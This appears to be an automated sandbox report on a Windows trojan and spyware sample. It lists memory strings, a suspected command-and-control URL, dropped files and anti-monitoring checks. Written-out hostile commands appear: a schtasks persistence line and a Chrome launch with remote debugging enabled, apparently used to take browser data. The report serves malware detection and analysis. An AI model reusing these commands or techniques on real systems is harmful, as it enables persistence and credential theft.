Source: chrome.exe, 00000003.00000002.2499549937.00001D8C0269C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 00000003.00000002.2497455779.00001D8C0222C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 00000003.00000002.2499549937.00001D8C0269C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000003.00000002.2500552713.00001D8C02828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000003.00000002.2500552713.00001D8C02828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7036ase
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000003.00000002.2497455779.00001D8C0222C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000003.00000002.2497455779.00001D8C0222C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7172te
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7279e-data
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000003.00000002.2497455779.00001D8C0222C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000003.00000002.2499321861.00001D8C02618000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000003.00000002.2497455779.00001D8C0222C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000003.00000002.2497455779.00001D8C0222C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215-L
Source: chrome.exe, 00000003.00000002.2497455779.00001D8C0222C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470543466.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 00000003.00000002.2503124800.00001D8C02DD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280e
Source: chrome.exe, 00000003.00000002.2498350970.00001D8C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000003.00000002.2500552713.00001D8C02828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000003.00000002.2497497637.00001D8C02266000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000003.00000003.2470572927.00001D8C02FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000003.00000003.2474002736.00001D8C03114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473730489.00001D8C03298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2473874678.00001D8C032A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2474947171.00001D8C032C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jsbin.com/temexa/4.
Source: Amcache.hve.12.dr String found in binary or memory: http://upx.sf.net
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000003.00000002.2500314783.00001D8C027C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2501285330.00001D8C029DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2505579264.00001D8C0328C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2499758730.00001D8C02700000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000003.2466513580.00001D8C02690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498896242.00001D8C02518000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466513580.00001D8C02690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466513580.00001D8C02690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000003.00000002.2498896242.00001D8C02518000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp
Source: chrome.exe, 00000003.00000003.2466513580.00001D8C02690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000003.00000002.2498896242.00001D8C02518000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000003.00000003.2466513580.00001D8C02690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000003.00000002.2498896242.00001D8C02518000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.c
Source: chrome.exe, 00000003.00000003.2466513580.00001D8C02690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000003.00000002.2498896242.00001D8C02518000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.go
Source: chrome.exe, 00000003.00000003.2466513580.00001D8C02690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466513580.00001D8C02690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498896242.00001D8C02518000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466513580.00001D8C02690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000003.00000003.2466513580.00001D8C02690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498896242.00001D8C02518000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000003.00000003.2477719434.00001D8C03418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000003.00000003.2466513580.00001D8C02690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498896242.00001D8C02518000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2502843344.00001D8C02D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498273424.00001D8C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000003.00000002.2498273424.00001D8C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/R
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2499632050.00001D8C026CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2503003628.00001D8C02D9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2500421171.00001D8C027F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000003.00000002.2500421171.00001D8C027F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000003.00000002.2503003628.00001D8C02D9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000003.00000002.2503003628.00001D8C02D9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000003.00000002.2503003628.00001D8C02D9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: ELLRGATenShKoyKeRtXA.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ip
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: chrome.exe, 00000003.00000002.2498350970.00001D8C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000003.00000002.2500314783.00001D8C027C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498350970.00001D8C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000003.00000002.2504436705.00001D8C02FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2498350970.00001D8C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000003.00000002.2499632050.00001D8C026CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2503672976.00001D8C02EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Q
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2503509656.00001D8C02E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443

System Summary

Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: 8kl5nJ3f9x.exe Static PE information: section name:
Source: 8kl5nJ3f9x.exe Static PE information: section name: .idata
Source: 8kl5nJ3f9x.exe Static PE information: section name:
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_000751B0 13_2_000751B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_00073E20 13_2_00073E20
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 1832
Source: 8kl5nJ3f9x.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 8kl5nJ3f9x.exe Static PE information: Section: xxuhznbt ZLIB complexity 0.994595043344519
Source: 8kl5nJ3f9x.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/7@16/5
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7136
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000003.00000002.2501870295.00001D8C02B5A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: 8kl5nJ3f9x.exe ReversingLabs: Detection: 60%
Source: 8kl5nJ3f9x.exe Virustotal: Detection: 48%
Source: unknown Process created: C:\Users\user\Desktop\8kl5nJ3f9x.exe "C:\Users\user\Desktop\8kl5nJ3f9x.exe"
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2296,i,13278071847370876534,15083286086121155287,262144 /prefetch:8
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 1832
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: 8kl5nJ3f9x.exe Static file information: File size 4481024 > 1048576
Source: 8kl5nJ3f9x.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: 8kl5nJ3f9x.exe Static PE information: Raw size of xxuhznbt is bigger than: 0x100000 < 0x1bf000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_000781E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,FreeLibrary, 13_2_000781E0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 8kl5nJ3f9x.exe Static PE information: real checksum: 0x4520a6 should be: 0x455a98
Source: 8kl5nJ3f9x.exe Static PE information: section name: xxuhznbt
Source: 8kl5nJ3f9x.exe Static PE information: section name: ewnmsqqp
Source: 8kl5nJ3f9x.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_0007A499 push es; iretd 13_2_0007A694
Source: 8kl5nJ3f9x.exe Static PE information: section name: xxuhznbt entropy: 7.956700776729312
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll Jump to dropped file
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

